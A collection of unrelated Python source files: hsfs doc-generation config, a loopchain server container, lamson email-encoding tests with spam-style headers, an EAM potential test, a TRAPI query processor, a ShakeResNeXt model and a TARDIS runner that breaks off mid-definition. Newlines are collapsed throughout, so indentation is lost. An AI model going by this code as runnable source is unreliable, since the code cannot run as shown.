import pathlib import shutil import keras_autodoc PAGES = { "project.md": { "connection": ["hsfs.connection.Connection"], "connection_methods": keras_autodoc.get_methods( "hsfs.connection.Connection", exclude=["connection"] ), }, "feature_store.md": { "fs_get": ["hsfs.connection.Connection.get_feature_store"], "fs_properties": keras_autodoc.get_properties( "hsfs.feature_store.FeatureStore" ), "fs_methods": keras_autodoc.get_methods( "hsfs.feature_store.FeatureStore", exclude=["from_response_json"] ), }, "feature.md": { "feature": ["hsfs.feature.Feature"], "feature_properties": keras_autodoc.get_properties("hsfs.feature.Feature"), "feature_methods": keras_autodoc.get_methods( "hsfs.feature.Feature", exclude=["from_response_json", "to_dict"] ), }, "feature_group.md": { "fg_create": ["hsfs.feature_store.FeatureStore.create_feature_group"], "fg_get": ["hsfs.feature_store.FeatureStore.get_feature_group"], "fg_properties": keras_autodoc.get_properties( "hsfs.feature_group.FeatureGroup" ), "fg_methods": keras_autodoc.get_methods( "hsfs.feature_group.FeatureGroup", exclude=[ "from_response_json", "update_from_response_json", "json", "to_dict", ], ), }, "training_dataset.md": { "td_create": ["hsfs.feature_store.FeatureStore.create_training_dataset"], "td_get": ["hsfs.feature_store.FeatureStore.get_training_dataset"], "td_properties": keras_autodoc.get_properties( "hsfs.training_dataset.TrainingDataset" ), "td_methods": keras_autodoc.get_methods( "hsfs.training_dataset.TrainingDataset", exclude=[ "from_response_json", "update_from_response_json", "json", "to_dict", ], ), "tf_record_dataset": ["hsfs.core.tfdata_engine.TFDataEngine.tf_record_dataset"], "tf_csv_dataset": ["hsfs.core.tfdata_engine.TFDataEngine.tf_csv_dataset"], }, "storage_connector.md": { "sc_get": [ "hsfs.feature_store.FeatureStore.get_storage_connector", "hsfs.feature_store.FeatureStore.get_online_storage_connector", ], "sc_methods": keras_autodoc.get_methods( "hsfs.storage_connector.StorageConnector", exclude=["from_response_json"] ), "sc_properties": keras_autodoc.get_properties( "hsfs.storage_connector.StorageConnector" ), }, "query_vs_dataframe.md": { "query_methods": keras_autodoc.get_methods("hsfs.constructor.query.Query"), "query_properties": keras_autodoc.get_properties( "hsfs.constructor.query.Query" ), }, "statistics.md": { "statistics_config": ["hsfs.statistics_config.StatisticsConfig"], "statistics_config_properties": keras_autodoc.get_properties( "hsfs.statistics_config.StatisticsConfig" ), }, "feature_validation.md": { "rule": ["hsfs.rule.Rule"], "rule_properties": keras_autodoc.get_properties("hsfs.rule.Rule"), "ruledefinition": ["hsfs.ruledefinition.RuleDefinition"], "ruledefinition_getall": ["hsfs.connection.Connection.get_rules"], "ruledefinition_get": ["hsfs.connection.Connection.get_rule"], "ruledefinition_properties": keras_autodoc.get_properties( "hsfs.ruledefinition.RuleDefinition" ), "expectation": ["hsfs.expectation.Expectation"], "expectation_properties": keras_autodoc.get_properties( "hsfs.expectation.Expectation" ), "expectation_methods": keras_autodoc.get_methods( "hsfs.expectation.Expectation", exclude=[ "from_response_json", "update_from_response_json", "json", "to_dict", ], ), "expectation_create": ["hsfs.feature_store.FeatureStore.create_expectation"], "expectation_get": ["hsfs.feature_store.FeatureStore.get_expectation"], "expectation_getall": ["hsfs.feature_store.FeatureStore.get_expectations"], "validation_result": ["hsfs.validation_result.ValidationResult"], "validation_result_properties": keras_autodoc.get_properties( "hsfs.validation_result.ValidationResult" ), "validate": ["hsfs.feature_group.FeatureGroup.validate"], "validation_result_get": ["hsfs.feature_group.FeatureGroup.get_validations"], }, "tags.md": { "fg_tag_add": ["hsfs.feature_group.FeatureGroupBase.add_tag"], "fg_tag_get": ["hsfs.feature_group.FeatureGroupBase.get_tag"], "fg_tag_get_all": ["hsfs.feature_group.FeatureGroupBase.get_tags"], "fg_tag_delete": ["hsfs.feature_group.FeatureGroupBase.delete_tag"], "td_tag_add": ["hsfs.training_dataset.TrainingDataset.add_tag"], "td_tag_get": ["hsfs.training_dataset.TrainingDataset.get_tag"], "td_tag_get_all": ["hsfs.training_dataset.TrainingDataset.get_tags"], "td_tag_delete": ["hsfs.training_dataset.TrainingDataset.delete_tag"], }, "api/connection_api.md": { "connection": ["hsfs.connection.Connection"], "connection_properties": keras_autodoc.get_properties( "hsfs.connection.Connection" ), "connection_methods": keras_autodoc.get_methods("hsfs.connection.Connection"), }, "api/feature_store_api.md": { "fs": ["hsfs.feature_store.FeatureStore"], "fs_get": ["hsfs.connection.Connection.get_feature_store"], "fs_properties": keras_autodoc.get_properties( "hsfs.feature_store.FeatureStore" ), "fs_methods": keras_autodoc.get_methods("hsfs.feature_store.FeatureStore"), }, "api/feature_group_api.md": { "fg": ["hsfs.feature_group.FeatureGroup"], "fg_create": ["hsfs.feature_store.FeatureStore.create_feature_group"], "fg_get": ["hsfs.feature_store.FeatureStore.get_feature_group"], "fg_properties": keras_autodoc.get_properties( "hsfs.feature_group.FeatureGroup" ), "fg_methods": keras_autodoc.get_methods("hsfs.feature_group.FeatureGroup"), }, "api/training_dataset_api.md": { "td": ["hsfs.training_dataset.TrainingDataset"], "td_create": ["hsfs.feature_store.FeatureStore.create_training_dataset"], "td_get": ["hsfs.feature_store.FeatureStore.get_training_dataset"], "td_properties": keras_autodoc.get_properties( "hsfs.training_dataset.TrainingDataset" ), "td_methods": keras_autodoc.get_methods( "hsfs.training_dataset.TrainingDataset" ), }, "api/feature_api.md": { "feature": ["hsfs.feature.Feature"], "feature_properties": keras_autodoc.get_properties("hsfs.feature.Feature"), "feature_methods": keras_autodoc.get_methods("hsfs.feature.Feature"), }, "api/storage_connector_api.md": { "sc_get": [ "hsfs.feature_store.FeatureStore.get_storage_connector", "hsfs.feature_store.FeatureStore.get_online_storage_connector", ], "sc_methods": keras_autodoc.get_methods( "hsfs.storage_connector.StorageConnector" ), "sc_properties": keras_autodoc.get_properties( "hsfs.storage_connector.StorageConnector" ), }, "api/statistics_config_api.md": { "statistics_config": ["hsfs.statistics_config.StatisticsConfig"], "statistics_config_properties": keras_autodoc.get_properties( "hsfs.statistics_config.StatisticsConfig" ), }, "api/rule_api.md": { "rule": ["hsfs.rule.Rule"], "rule_properties": keras_autodoc.get_properties("hsfs.rule.Rule"), }, "api/rule_definition_api.md": { "ruledefinition": ["hsfs.ruledefinition.RuleDefinition"], "ruledefinition_getall": ["hsfs.connection.Connection.get_rules"], "ruledefinition_get": ["hsfs.connection.Connection.get_rule"], "ruledefinition_properties": keras_autodoc.get_properties( "hsfs.ruledefinition.RuleDefinition" ), }, "api/expectation_api.md": { "expectation": ["hsfs.expectation.Expectation"], "expectation_properties": keras_autodoc.get_properties( "hsfs.expectation.Expectation" ), "expectation_methods": keras_autodoc.get_methods( "hsfs.expectation.Expectation", exclude=[ "from_response_json", "update_from_response_json", "json", "to_dict", ], ), "expectation_create": ["hsfs.feature_store.FeatureStore.create_expectation"], "expectation_get": ["hsfs.feature_store.FeatureStore.get_expectation"], "expectation_getall": ["hsfs.feature_store.FeatureStore.get_expectations"], }, "api/validation_api.md": { "validation_result": ["hsfs.validation_result.ValidationResult"], "validation_result_properties": keras_autodoc.get_properties( "hsfs.validation_result.ValidationResult" ), "validate": ["hsfs.feature_group.FeatureGroup.validate"], "validation_result_get": ["hsfs.feature_group.FeatureGroup.get_validations"], }, } hsfs_dir = pathlib.Path(__file__).resolve().parents[0] def generate(dest_dir): doc_generator = keras_autodoc.DocumentationGenerator( PAGES, project_url="https://github.com/logicalclocks/feature-store-api/blob/master/python", template_dir="./docs/templates", titles_size="###", extra_aliases={ "hsfs.core.query.Query": "hsfs.Query", "hsfs.storage_connector.StorageConnector": "hsfs.StorageConnector", "hsfs.statistics_config.StatisticsConfig": "hsfs.StatisticsConfig", "hsfs.training_dataset_feature.TrainingDatasetFeature": "hsfs.TrainingDatasetFeature", "pandas.core.frame.DataFrame": "pandas.DataFrame", }, max_signature_line_length=100, ) shutil.copyfile(hsfs_dir / "CONTRIBUTING.md", dest_dir / "CONTRIBUTING.md") shutil.copyfile(hsfs_dir / "README.md", dest_dir / "index.md") doc_generator.generate(dest_dir / "generated") if __name__ == "__main__": generate(hsfs_dir / "docs")
py
7dfa0f5351b7b3a6dd32dd3187d8b160bdf68d33
# Copyright 2017 theloop, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """A module for containers on the loopchain """ import logging import grpc from enum import Enum from concurrent import futures from loopchain.rest_server import RestServer, RestServerRS from loopchain import configure as conf from loopchain.baseservice import CommonProcess from loopchain.protos import loopchain_pb2_grpc class ServerType(Enum): REST_RS = 1 REST_PEER = 2 GRPC = 3 class Container(CommonProcess): def __init__(self, port, type=ServerType.GRPC, peer_ip=None): CommonProcess.__init__(self) self._port = port self._type = type self._peer_ip = peer_ip def run(self, conn): logging.debug("Container run...") if self._type == ServerType.GRPC: server = grpc.server(futures.ThreadPoolExecutor(max_workers=conf.MAX_WORKERS)) loopchain_pb2_grpc.add_ContainerServicer_to_server(self, server) server.add_insecure_port('[::]:' + str(self._port)) elif self._type == ServerType.REST_PEER: server = RestServer(self._port, self._peer_ip) else: server = RestServerRS(self._port) server.start() command = None while command != "quit": try: command, param = conn.recv() # Queue 에 내용이 들어올 때까지 여기서 대기 된다. 따라서 Sleep 이 필요 없다. logging.debug("Container got: " + str(param)) except Exception as e: logging.warning("Container conn.recv() error: " + str(e)) if self._type == ServerType.GRPC: server.stop(0) else: server.stop() logging.info("Server Container Ended.")
py
7dfa0f6f2b0a3efd37074b95b1df97e91d805174
from __future__ import with_statement from nose.tools import * import re import os from lamson import encoding, mail import mailbox import email from email import encoders from email.utils import parseaddr from mock import * import chardet BAD_HEADERS = [ u'"\u8003\u53d6\u5206\u4eab" <[email protected]>'.encode('utf-8'), '"=?windows-1251?B?RXhxdWlzaXRlIFJlcGxpY2E=?="\n\t<[email protected]>', '=?iso-2022-jp?B?Zmlicm91c19mYXZvcmF0ZUB5YWhvby5jby5qcA==?=<[email protected]>', '=?windows-1252?Q?Global_Leadership_in_HandCare_-_Consumer,\n\t_Professional_and_Industrial_Products_OTC_:_FLKI?=', '=?windows-1252?q?Global_Leadership_in_Handcare_-_Consumer, _Auto,\n\t_Professional_&_Industrial_Products_-_OTC_:_FLKI?=', 'I am just normal.', '=?koi8-r?B?WW91ciBtYW6ScyBzdGFtaW5hIHdpbGwgY29tZSBiYWNrIHRvIHlvdSBs?=\n\t=?koi8-r?B?aWtlIGEgYm9vbWVyYW5nLg==?=', '=?koi8-r?B?WW91IGNhbiBiZSBvbiB0b3AgaW4gYmVkcm9vbSBhZ2FpbiCWIGp1c3Qg?=\n\t=?koi8-r?B?YXNrIHVzIGZvciBhZHZpY2Uu?=', '"=?koi8-r?B?5MXMz9DSz8na18/E09TXzw==?=" <[email protected]>', '=?utf-8?b?IumrlOiCsuWckuWNgOermSDihpIg6ZW35bqa6Yar6Zmi56uZIOKGkiDmlofljJbk?=\n =?utf-8?b?uInot6/nq5kiIDx2Z3hkcmp5Y2lAZG5zLmh0Lm5ldC50dz4=?=', '=?iso-8859-1?B?SOlhdnkgTel05WwgVW7uY/hk?=\n\t=?iso-8859-1?Q?=E9?=', ] DECODED_HEADERS = encoding.header_from_mime_encoding(BAD_HEADERS) NORMALIZED_HEADERS = [encoding.header_to_mime_encoding(x) for x in DECODED_HEADERS] def test_MailBase(): the_subject = u'p\xf6stal' m = encoding.MailBase() m['To'] = "testing@localhost" m['Subject'] = the_subject assert m['To'] == "testing@localhost" assert m['TO'] == m['To'] assert m['to'] == m['To'] assert m['Subject'] == the_subject assert m['subject'] == m['Subject'] assert m['sUbjeCt'] == m['Subject'] msg = encoding.to_message(m) m2 = encoding.from_message(msg) assert_equal(len(m), len(m2)) for k in m: assert m[k] == m2[k], "%s: %r != %r" % (k, m[k], m2[k]) for k in m.keys(): assert k in m del m[k] assert not k in m def test_header_to_mime_encoding(): for i, header in enumerate(DECODED_HEADERS): assert_equal(NORMALIZED_HEADERS[i], encoding.header_to_mime_encoding(header)) def test_dumb_shit(): # this is a sample of possibly the worst case Mutt can produce idiot = '=?iso-8859-1?B?SOlhdnkgTel05WwgVW7uY/hk?=\n\t=?iso-8859-1?Q?=E9?=' should_be = u'H\xe9avy M\xe9t\xe5l Un\xeec\xf8d\xe9' assert_equal(encoding.header_from_mime_encoding(idiot), should_be) def test_header_from_mime_encoding(): assert not encoding.header_from_mime_encoding(None) assert_equal(len(BAD_HEADERS), len(encoding.header_from_mime_encoding(BAD_HEADERS))) for i, header in enumerate(BAD_HEADERS): assert_equal(DECODED_HEADERS[i], encoding.header_from_mime_encoding(header)) def test_to_message_from_message_with_spam(): mb = mailbox.mbox("tests/spam") fails = 0 total = 0 for msg in mb: try: m = encoding.from_message(msg) out = encoding.to_message(m) assert repr(out) m2 = encoding.from_message(out) for k in m: if '@' in m[k]: assert_equal(parseaddr(m[k]), parseaddr(m2[k])) else: assert m[k].strip() == m2[k].strip(), "%s: %r != %r" % (k, m[k], m2[k]) assert not m[k].startswith(u"=?") assert not m2[k].startswith(u"=?") assert m.body == m2.body, "Bodies don't match" assert_equal(len(m.parts), len(m2.parts), "Not the same number of parts.") for i, part in enumerate(m.parts): assert part.body == m2.parts[i].body, "Part %d isn't the same: %r \nvs\n. %r" % (i, part.body, m2.parts[i].body) total += 1 except encoding.EncodingError, exc: fails += 1 assert fails/total < 0.01, "There were %d failures out of %d total." % (fails, total) def test_to_file_from_file(): mb = mailbox.mbox("tests/spam") msg = encoding.from_message(mb[0]) outfile = "run/encoding_test.msg" with open(outfile, 'w') as outfp: encoding.to_file(msg, outfp) with open(outfile) as outfp: msg2 = encoding.from_file(outfp) outdata = open(outfile).read() assert_equal(len(msg), len(msg2)) os.unlink(outfile) def test_guess_encoding_and_decode(): for header in DECODED_HEADERS: try: encoding.guess_encoding_and_decode('ascii', header.encode('utf-8')) except encoding.EncodingError: pass def test_attempt_decoding(): for header in DECODED_HEADERS: encoding.attempt_decoding('ascii', header.encode('utf-8')) def test_properly_decode_header(): for i, header in enumerate(BAD_HEADERS): parsed = encoding.properly_decode_header(header) assert_equal(DECODED_HEADERS[i], parsed) def test_headers_round_trip(): # round trip the headers to make sure they convert reliably back and forth for header in BAD_HEADERS: original = encoding.header_from_mime_encoding(header) assert original assert "=?" not in original and "?=" not in original, "Didn't decode: %r" % (encoding.SCANNER.scan(header),) encoded = encoding.header_to_mime_encoding(original) assert encoded return_original = encoding.header_from_mime_encoding(encoded) assert_equal(original, return_original) return_encoded = encoding.header_to_mime_encoding(return_original) assert_equal(encoded, return_encoded) def test_MIMEPart(): text1 = encoding.MIMEPart("text/plain") text1.set_payload("The first payload.") text2 = encoding.MIMEPart("text/plain") text2.set_payload("The second payload.") image_data = open("tests/lamson.png").read() img1 = encoding.MIMEPart("image/png") img1.set_payload(image_data) img1.set_param('attachment','', header='Content-Disposition') img1.set_param('filename','lamson.png', header='Content-Disposition') encoders.encode_base64(img1) multi = encoding.MIMEPart("multipart/mixed") for x in [text1, text2, img1]: multi.attach(x) mail = encoding.from_message(multi) assert mail.parts[0].body == "The first payload." assert mail.parts[1].body == "The second payload." assert mail.parts[2].body == image_data encoding.to_message(mail) @patch('chardet.detect', new=Mock()) @raises(encoding.EncodingError) def test_guess_encoding_fails_completely(): chardet.detect.return_value = {'encoding': None, 'confidence': 0.0} encoding.guess_encoding_and_decode('ascii', 'some data', errors='strict') def test_attach_text(): mail = encoding.MailBase() mail.attach_text("This is some text.", 'text/plain') msg = encoding.to_message(mail) assert msg.get_payload(0).get_payload() == "This is some text." assert encoding.to_string(mail) mail.attach_text("<html><body><p>Hi there.</p></body></html>", "text/html") msg = encoding.to_message(mail) assert len(msg.get_payload()) == 2 assert encoding.to_string(mail) def test_attach_file(): mail = encoding.MailBase() png = open("tests/lamson.png").read() mail.attach_file("lamson.png", png, "image/png", "attachment") msg = encoding.to_message(mail) payload = msg.get_payload(0) assert payload.get_payload(decode=True) == png assert payload.get_filename() == "lamson.png", payload.get_filename() def test_content_encoding_headers_are_maintained(): inmail = encoding.from_file(open("tests/signed.msg")) ctype, ctype_params = inmail.content_encoding['Content-Type'] assert_equal(ctype, 'multipart/signed') # these have to be maintained for key in ['protocol', 'micalg']: assert key in ctype_params # these get removed for key in encoding.CONTENT_ENCODING_REMOVED_PARAMS: assert key not in ctype_params outmsg = encoding.to_message(inmail) ctype, ctype_params = encoding.parse_parameter_header(outmsg, 'Content-Type') for key in ['protocol', 'micalg']: assert key in ctype_params, key def test_odd_content_type_with_charset(): mail = encoding.MailBase() mail.body = u"p\xf6stal".encode('utf-8') mail.content_encoding['Content-Type'] = ('application/plain', {'charset': 'utf-8'}) msg = encoding.to_string(mail) assert msg def test_specially_borked_lua_message(): assert encoding.from_file(open("tests/borked.msg")) def raises_TypeError(*args): raise TypeError() @patch('lamson.encoding.MIMEPart.__init__') @raises(encoding.EncodingError) def test_to_message_encoding_error(mp_init): mp_init.side_effect = raises_TypeError test = encoding.from_file(open("tests/borked.msg")) msg = encoding.to_message(test) def raises_UnicodeError(*args): raise UnicodeError() @raises(encoding.EncodingError) def test_guess_encoding_and_decode_unicode_error(): data = Mock() data.__str__ = Mock() data.__str__.return_value = u"\0\0" data.decode.side_effect = raises_UnicodeError encoding.guess_encoding_and_decode("ascii", data) def test_attempt_decoding_with_bad_encoding_name(): assert_equal("test", encoding.attempt_decoding("asdfasdf", "test")) @raises(encoding.EncodingError) def test_apply_charset_to_header_with_bad_encoding_char(): encoding.apply_charset_to_header('ascii', 'X', 'bad') def test_odd_roundtrip_bug(): decoded_addrs=[u'"\u0414\u0435\u043b\u043e\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u043e" <[email protected]>', u'"\u8003\u53d6\u5206\u4eab" <[email protected]>', u'"Exquisite Replica"\n\t<[email protected]>',] for decoded in decoded_addrs: encoded = encoding.header_to_mime_encoding(decoded) assert '<' in encoded and '"' in encoded, "Address wasn't encoded correctly:\n%s" % encoded
py
7dfa109ce8d225afee512d9536199343d4bb9d44
import pytest import os from collections import OrderedDict # <----- TESTING HARNESS VARIABLES Ni_eam_potential_definition = OrderedDict() Ni_eam_potential_definition['potential_type'] = 'eam' Ni_eam_potential_definition['setfl_filename']=None Ni_eam_potential_definition['pair_type']='morse' Ni_eam_potential_definition['density_type']='eam_dens_exp' Ni_eam_potential_definition['embedding_type']='eam_embed_universal' Ni_eam_potential_definition['N_r'] = 2000 Ni_eam_potential_definition['r_max'] = 10.0 Ni_eam_potential_definition['r_cut'] = 8.9 Ni_eam_potential_definition['N_rho'] = 2000 Ni_eam_potential_definition['rho_max'] = 10.0 Ni_eam_potential_definition['symbols'] = ['Ni'] Ni_eam_parameters = OrderedDict() Ni_eam_parameters['p_NiNi_D0'] = 0.001114 Ni_eam_parameters['p_NiNi_a'] = 3.429506 Ni_eam_parameters['p_NiNi_r0'] = 2.6813 Ni_eam_parameters['d_Ni_rho0'] = 10.0 Ni_eam_parameters['d_Ni_beta'] = 5.0 Ni_eam_parameters['d_Ni_r0'] = 2.0 Ni_eam_parameters['e_Ni_F0'] = 4.10341782e-3 Ni_eam_parameters['e_Ni_p'] = 8.96274624 Ni_eam_parameters['e_Ni_q'] = 8.95940869 Ni_eam_parameters['e_Ni_F1'] = -3.09 configuration = OrderedDict() configuration['potential'] = Ni_eam_potential_definition configuration['parameters'] = Ni_eam_parameters #<------------- unpack dictionary symbols = configuration['potential']['symbols'] func_pair = configuration['potential']['pair_type'] func_density = configuration['potential']['density_type'] func_embedding = configuration['potential']['embedding_type'] parameters = configuration['parameters'] #<------------ setup for testing from pypospack.potential import EamPotential eam = EamPotential( symbols=symbols, func_pair=func_pair, func_density=func_density, func_embedding=func_embedding) a0 = 3.50803 sites = ['T','O','1NN','2NN','3NN'] N = OrderedDict() N['T'] = 4 N['O'] = 4 N['1NN'] = 12 N['2NN'] = 6 N['3NN'] = 24 da = OrderedDict() da['T'] = 0.433 da['O'] = 0.866 da['1NN']= 0.707 da['2NN']= 1.00 da['3NN'] = 1.225 rcut = 0.5 * (da['2NN'] + da['3NN']) rho = OrderedDict() for s in sites: _pair = eam.evaluate_density( r=a0*da[s], parameters=parameters) for p in _pair: if p not in rho: rho[p] = OrderedDict() rho[p][s] = _pair[p] print(rho) _pair = [p for p in rho] for p in _pair: for s in sites: print("{s:^10}{N_s:^10}{da:^10.4f}{rho:^15.4e}{ttl_rho:^15.4e}".format( s=s, N_s=N[s], da=da[s], rho=rho[p][s], ttl_rho=N[s]*rho[p][s])) sites_lte_1NN = ['1NN'] rho_lte_1NN = 0. filename = "Ni.eam.alloy" Nr = configuration['potential']['N_r'] rmax = configuration['potential']['r_max'] rcut = configuration['potential']['r_cut'] Nrho = configuration['potential']['N_rho'] rhomax = configuration['potential']['rho_max'] eam.write_setfl_file( filename=filename, symbols=symbols, Nr=Nr, rmax=rmax, rcut=rcut, Nrho=Nrho, rhomax=rhomax, parameters=parameters) assert os.path.isfile(filename)
py
7dfa1107c8990bf35bd842f176536ebc04668d79
from sys import path from django.http import response from django.http.response import JsonResponse from trapi_model import knowledge_graph from trapi_model.query import Query from trapi_model.biolink.constants import * from trapi_model.knowledge_graph import KnowledgeGraph, KNode, KEdge from .models import * class QueryProcessor: def __init__(self, query) -> None: self.query = query self.response = None def build_response(self) -> None: raise NotImplementedError def get_response(self) -> JsonResponse: raise NotImplementedError def extract_primary_key() -> str: raise NotImplementedError class PathwayToGeneWildcardQueryProcessor(QueryProcessor): def __init__(self, query) -> None: super().__init__(query) self.pathway_nodes_id = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY]) self.pathway_nodes_id = list(self.pathway_nodes_id)[0] pathway_node = query.message.query_graph.nodes.get(self.pathway_nodes_id) self.pathway_curie = (pathway_node.ids[0]) #TODO: implement querying self.response = 'dd' def getResponse(self): return JsonResponse(self.response, safe=False) class GeneToPathwayWildcardQueryProcessor(QueryProcessor): def __init__(self, query) -> None: super().__init__(query) self.gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY]) self.gene_nodes_ids = list(self.gene_nodes_ids)[0] gene_node = query.message.query_graph.nodes.get(self.gene_nodes_ids) self.gene_curie = (gene_node.ids[0]) self.pathways = GeneToPathway.objects.get(gene__exact=self.gene_curie).get_result() print(self.pathways) self.build_response() def build_response(self) -> None: knowledge_graph = KnowledgeGraph() gene_count = 0 knowledge_graph.add_node(curie=self.gene_curie, categories="biolink:Gene", name=self.gene_curie) for pathway in self.pathways: gene_count = gene_count + 1 print(pathway) knowledge_graph.add_node(curie=pathway, categories="biolink:Pathway", name=pathway) knowledge_graph.add_edge(k_subject='n0', k_object="n{}".format(gene_count), predicate="biolink:participates_in") self.response = knowledge_graph.to_dict() def getResponse(self) -> JsonResponse: return JsonResponse(self.response, safe=False) class InvalidQueryProcessor(QueryProcessor): def __init__(self,query) -> None: super().__init__(query) def getResponse(self): return JsonResponse('invalid query type', safe=False) class QueryIdentifier: """ Identifies the type of query being passed so that the appropriate query processor7 may be applied to the query :param """ @staticmethod def getQueryProcessor(request) -> QueryProcessor: def isGeneToPathwayWildcardQuery(query:Query)->bool: """ Identifies if a query is a gene to pathway query """ #check genes pathway_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY]) gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY]) if pathway_nodes_ids is None: return False if gene_nodes_ids is None: return False if len(pathway_nodes_ids) != 1: return False if len(gene_nodes_ids) != 1: return False #check edge edges = query.message.query_graph.edges if len(edges) != 1: return False id = list(edges.keys())[0] edge = edges.get(id) #check predicate predicates = edge.predicates if len(predicates) != 1: return False predicate = predicates[0] predicate = predicate.passed_name if predicate != 'biolink:participates_in': return False #return True if all is swell return True def isPathwayToGeneWildcardQuery(query:Query)->bool: """ Identifies if a query is a pathway to gene query """ pathway_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_PATHWAY_ENTITY]) gene_nodes_ids = query.message.query_graph.find_nodes(categories=[BIOLINK_GENE_ENTITY]) if pathway_nodes_ids is None: return False if gene_nodes_ids is None: return False if len(pathway_nodes_ids) != 1: return False if len(gene_nodes_ids) != 1: return False #check edge edges = query.message.query_graph.edges if len(edges) != 1: return False id = list(edges.keys())[0] edge = edges.get(id) #check predicate predicates = edge.predicates if len(predicates) != 1: return False predicate = predicates[0] predicate = predicate.passed_name if predicate != 'biolink:has_participant': return False #return True if all is swell return True #Load in query from query = Query.load('1.1', biolink_version=None, query=request.data, metakgValidation=False, semanticOperations=False) query_processor = None if isPathwayToGeneWildcardQuery(query): query_processor = PathwayToGeneWildcardQueryProcessor(query) elif isGeneToPathwayWildcardQuery(query): query_processor = GeneToPathwayWildcardQueryProcessor(query) else: query_processor = InvalidQueryProcessor(query) return query_processor
py
7dfa111e7e834676abfb3857f0c41d718433368f
# -*- coding: utf-8 -*- import math import torch.nn as nn import torch.nn.functional as F from .shakeshake import ShakeShake from .shakeshake import Shortcut class ShakeBottleNeck(nn.Module): def __init__(self, in_ch, mid_ch, out_ch, cardinary, stride=1): super(ShakeBottleNeck, self).__init__() self.equal_io = in_ch == out_ch self.shortcut = None if self.equal_io else Shortcut(in_ch, out_ch, stride=stride) self.branch1 = self._make_branch(in_ch, mid_ch, out_ch, cardinary, stride) self.branch2 = self._make_branch(in_ch, mid_ch, out_ch, cardinary, stride) def forward(self, x): h1 = self.branch1(x) h2 = self.branch2(x) h = ShakeShake.apply(h1, h2, self.training) h0 = x if self.equal_io else self.shortcut(x) return h + h0 def _make_branch(self, in_ch, mid_ch, out_ch, cardinary, stride=1): return nn.Sequential( nn.Conv2d(in_ch, mid_ch, 1, padding=0, bias=False), nn.BatchNorm2d(mid_ch), nn.ReLU(inplace=False), nn.Conv2d(mid_ch, mid_ch, 3, padding=1, stride=stride, groups=cardinary, bias=False), nn.BatchNorm2d(mid_ch), nn.ReLU(inplace=False), nn.Conv2d(mid_ch, out_ch, 1, padding=0, bias=False), nn.BatchNorm2d(out_ch)) class ShakeResNeXt(nn.Module): def __init__(self, depth, w_base, cardinary, label): super(ShakeResNeXt, self).__init__() n_units = (depth - 2) // 9 n_chs = [64, 128, 256, 1024] self.n_chs = n_chs self.in_ch = n_chs[0] self.c_in = nn.Conv2d(3, n_chs[0], 3, padding=1) self.layer1 = self._make_layer(n_units, n_chs[0], w_base, cardinary) self.layer2 = self._make_layer(n_units, n_chs[1], w_base, cardinary, 2) self.layer3 = self._make_layer(n_units, n_chs[2], w_base, cardinary, 2) self.fc_out = nn.Linear(n_chs[3], label) # Initialize paramters for m in self.modules(): if isinstance(m, nn.Conv2d): n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels m.weight.data.normal_(0, math.sqrt(2. / n)) elif isinstance(m, nn.BatchNorm2d): m.weight.data.fill_(1) m.bias.data.zero_() elif isinstance(m, nn.Linear): m.bias.data.zero_() def forward(self, x): h = self.c_in(x) h = self.layer1(h) h = self.layer2(h) h = self.layer3(h) h = F.relu(h) h = F.avg_pool2d(h, 8) h = h.view(-1, self.n_chs[3]) h = self.fc_out(h) return h def _make_layer(self, n_units, n_ch, w_base, cardinary, stride=1): layers = [] mid_ch, out_ch = n_ch * (w_base // 64) * cardinary, n_ch * 4 for i in range(n_units): layers.append(ShakeBottleNeck(self.in_ch, mid_ch, out_ch, cardinary, stride=stride)) self.in_ch, stride = out_ch, 1 return nn.Sequential(*layers)
py
7dfa116ca8f1645119be49297fe077082b8c3db7
import os import logging import warnings from astropy import units as u from tardis import constants as const from numba import set_num_threads from scipy.special import zeta from tardis.montecarlo.spectrum import TARDISSpectrum from tardis.util.base import quantity_linspace from tardis.io.util import HDFWriterMixin from tardis.montecarlo import packet_source as source from tardis.montecarlo.montecarlo_numba.formal_integral import FormalIntegrator from tardis.montecarlo import montecarlo_configuration as mc_config_module from tardis.montecarlo.montecarlo_numba import montecarlo_radial1d from tardis.montecarlo.montecarlo_numba.numba_interface import ( configuration_initialize, ) from tardis.montecarlo.montecarlo_numba import numba_config from tardis.io.logger import montecarlo_tracking as mc_tracker import numpy as np logger = logging.getLogger(__name__) MAX_SEED_VAL = 2 ** 32 - 1 # MAX_SEED_VAL must be multiple orders of magnitude larger than no_of_packets; # otherwise, each packet would not have its own seed. Here, we set the max # seed val to the maximum allowed by numpy. # TODO: refactor this into more parts class MontecarloRunner(HDFWriterMixin): """ This class is designed as an interface between the Python part and the montecarlo C-part """ hdf_properties = [ "output_nu", "output_energy", "nu_bar_estimator", "j_estimator", "montecarlo_virtual_luminosity", "last_interaction_in_nu", "last_interaction_type", "last_line_interaction_in_id", "last_line_interaction_out_id", "last_line_interaction_shell_id", "packet_luminosity", "spectrum", "spectrum_virtual", "spectrum_reabsorbed", "time_of_simulation", "emitted_packet_mask", ] vpacket_hdf_properties = [ "virt_packet_nus", "virt_packet_energies", "virt_packet_initial_rs", "virt_packet_initial_mus", "virt_packet_last_interaction_in_nu", "virt_packet_last_interaction_type", "virt_packet_last_line_interaction_in_id", "virt_packet_last_line_interaction_out_id", ] hdf_name = "runner" w_estimator_constant = ( (const.c ** 2 / (2 * const.h)) * (15 / np.pi ** 4) * (const.h / const.k_B) ** 4 / (4 * np.pi) ).cgs.value t_rad_estimator_constant = ( (np.pi ** 4 / (15 * 24 * zeta(5, 1))) * (const.h / const.k_B) ).cgs.value def __init__( self, seed, spectrum_frequency, virtual_spectrum_spawn_range, disable_electron_scattering, enable_reflective_inner_boundary, enable_full_relativity, inner_boundary_albedo, line_interaction_type, integrator_settings, v_packet_settings, spectrum_method, 